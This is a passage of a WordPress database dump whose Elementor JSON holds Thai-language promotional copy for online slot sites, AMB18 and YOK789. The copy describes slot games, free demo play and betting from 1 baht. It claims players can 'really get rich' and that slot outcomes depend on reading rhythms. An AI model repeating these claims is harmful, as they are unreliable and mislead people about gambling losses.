\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2794,382,'_thumbnail_id','371'),(2795,382,'_elementor_edit_mode','builder'),(2796,382,'_elementor_template_type','wp-page'),(2797,382,'_elementor_version','3.35.5'),(2798,382,'_elementor_pro_version','3.32.3'),(2799,382,'_wp_page_template','default'),(2800,382,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2801,382,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 